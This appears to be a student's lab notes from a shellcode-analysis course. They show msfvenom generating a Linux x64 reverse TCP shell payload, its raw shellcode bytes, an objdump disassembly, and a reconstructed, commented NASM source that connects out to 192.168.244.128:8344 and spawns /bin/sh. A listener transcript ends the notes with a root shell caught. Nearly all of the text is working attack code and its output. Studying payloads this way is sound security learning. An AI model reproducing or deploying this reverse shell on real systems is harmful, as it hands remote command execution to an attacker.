===
root@kali32:/opt/payload# msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.244.128 LPORT=8344 --platform linux -f c
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 74 bytes
Final size of c file: 335 bytes
unsigned char buf[] =
"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48"
"\xb9\x02\x00\x20\x98\xc0\xa8\xf4\x80\x51\x48\x89\xe6\x6a\x10"
"\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58"
"\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f"
"\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05";
root@kali32:/opt/payload#
==

root@kali32:/opt/payload# msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.244.128 LPORT=8344 --platform linux -f elf -o revshell64
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
Saved as: revshell64

==objdump code extract

0000000000201060 <code>:
  201060:       6a 29                   push   0x29
  201062:       58                      pop    rax
  201063:       99                      cdq
  201064:       6a 02                   push   0x2
  201066:       5f                      pop    rdi
  201067:       6a 01                   push   0x1
  201069:       5e                      pop    rsi
  20106a:       0f 05                   syscall
  20106c:       48 97                   xchg   rdi,rax
  20106e:       48 b9 02 00 20 98 c0    movabs rcx,0x80f4a8c098200002
  201075:       a8 f4 80
  201078:       51                      push   rcx
  201079:       48 89 e6                mov    rsi,rsp
  20107c:       6a 10                   push   0x10
  20107e:       5a                      pop    rdx
  20107f:       6a 2a                   push   0x2a
  201081:       58                      pop    rax
  201082:       0f 05                   syscall
  201084:       6a 03                   push   0x3
  201086:       5e                      pop    rsi
  201087:       48 ff ce                dec    rsi
  20108a:       6a 21                   push   0x21
  20108c:       58                      pop    rax
  20108d:       0f 05                   syscall
  20108f:       75 f6                   jne    201087 <code+0x27>
  201091:       6a 3b                   push   0x3b
  201093:       58                      pop    rax
  201094:       99                      cdq
  201095:       48 bb 2f 62 69 6e 2f    movabs rbx,0x68732f6e69622f
  20109c:       73 68 00
  20109f:       53                      push   rbx
  2010a0:       48 89 e7                mov    rdi,rsp
  2010a3:       52                      push   rdx
  2010a4:       57                      push   rdi
  2010a5:       48 89 e6                mov    rsi,rsp
  2010a8:       0f 05                   syscall


====
Reconstruct shellcode

root@kali:/opt/slae/shellcode_anlyz/revshell# cat rev64.nasm
global _start

section .text

_start:

Create_Socket:

        push   0x29
        pop    rax
        cdq
        push   0x2
        pop    rdi
        push   0x1
        pop    rsi
        syscall

Socket_Struct:

        xchg   rdi,rax
        mov    rcx,0x80f4a8c098200002   ; IP:192.168.244.128 Port:8344

        push   rcx
        mov    rsi,rsp
        push   0x10
        pop    rdx

Socket_Connect:

        push   0x2a
        pop    rax
        syscall

        push   0x3
        pop    rsi

dup2:

        dec    rsi
        push   0x21
        pop    rax
        syscall
        jne    dup2

Execve:

        push   0x3b
        pop    rax
        cdq
        mov    rbx,0x68732f6e69622f
        push   rbx
        mov    rdi,rsp
        push   rdx
        push   rdi
        mov    rsi,rsp
        syscall
===========
root@kali:/opt/slae/shellcode_anlyz/revshell# ./rev64

root@kali:/opt/slae/code/Execve-JCP# nc -lvp 8344
listening on [any] 8344 ...
connect to [192.168.244.128] from kali [192.168.244.128] 45668
id
uid=0(root) gid=0(root) groups=0(root)
exit
==========
